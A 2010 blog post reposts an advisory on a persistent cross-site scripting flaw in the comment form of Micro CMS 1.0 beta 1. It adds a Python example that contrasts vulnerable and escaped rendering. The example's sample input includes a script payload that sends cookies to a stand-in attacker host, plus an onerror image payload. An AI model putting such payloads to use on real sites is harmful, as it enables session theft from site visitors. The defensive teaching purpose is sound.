Sunday, October 24, 2010

Micro CMS: Cross-site Scripting Vulnerability

Users of Micro CMS, please be advised that a Cross-site Scripting vulnerability has been identified in the product.

For details of this vulnerability, possible remedies, and other advisories, see the Security Advisories page at Critical Watch (http://criticalwatch.com/support/security-advisories.aspx).

Amplify’d from www.criticalwatch.com
SecPod 1004: Micro CMS Cross-site Scripting
Affected Software:
------------------
Micro CMS 1.0 beta 1 and prior

Technical Description:
----------------------
Micro CMS is prone to a Persistent Cross-Site Scripting vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'name' parameter (and likewise the comment text area) in a comment section to "comments/send/" is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. This may allow the attacker to steal cookie-based authentication and to launch further attacks.
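As an added illustration, not taken from the advisory or from the Micro CMS code base (whose language and internals the advisory does not describe), the following Python sketch shows the persistent XSS pattern described above beside a hardened version. A stored comment's name and text fields are rendered into HTML once verbatim and once with HTML output encoding applied at the point where the values are returned to the user. The field names, the wrapper markup, and the sample payload are assumptions constructed for this example.

```python
import html

# Constructed sample submission (hypothetical): what an attacker might POST
# to a comment form such as the advisory's "comments/send/" endpoint.
SAMPLE_COMMENT = {
    "name": '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    "text": 'Nice post! <img src=x onerror="alert(1)">',
}


def render_comment_vulnerable(comment):
    """Echo the stored fields back verbatim.

    This is the persistent XSS pattern the advisory describes: whatever the
    submitter typed into 'name' or the text area becomes live markup for every
    visitor who views the comment.
    """
    return f'<div class="comment"><b>{comment["name"]}</b><p>{comment["text"]}</p></div>'


def render_comment_hardened(comment):
    """Encode every user-controlled value for the HTML context it lands in.

    html.escape with quote=True converts < > & " and ' to entities, so the
    browser renders the payload as text. The same helper is therefore also
    safe for values placed inside double- or single-quoted attributes.
    """
    name = html.escape(comment["name"], quote=True)
    text = html.escape(comment["text"], quote=True)
    return f'<div class="comment"><b>{name}</b><p>{text}</p></div>'


def contains_attacker_tags(rendered):
    """Crude check: did the sample payload's tags survive as real markup?

    Only the tags from SAMPLE_COMMENT are looked for; this is a test aid for
    the example, not a general XSS detector.
    """
    lowered = rendered.lower()
    return "<script" in lowered or "<img" in lowered


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(SAMPLE_COMMENT))
    print("hardened:  ", render_comment_hardened(SAMPLE_COMMENT))
```

Encoding at output time is the fix that matters here: filtering on the way in can be bypassed or forgotten for one field (the advisory notes both the 'name' parameter and the text area are affected), whereas escaping every value as it is written into the page covers all of them. Values placed into a script block or a URL would need encoding for that context instead.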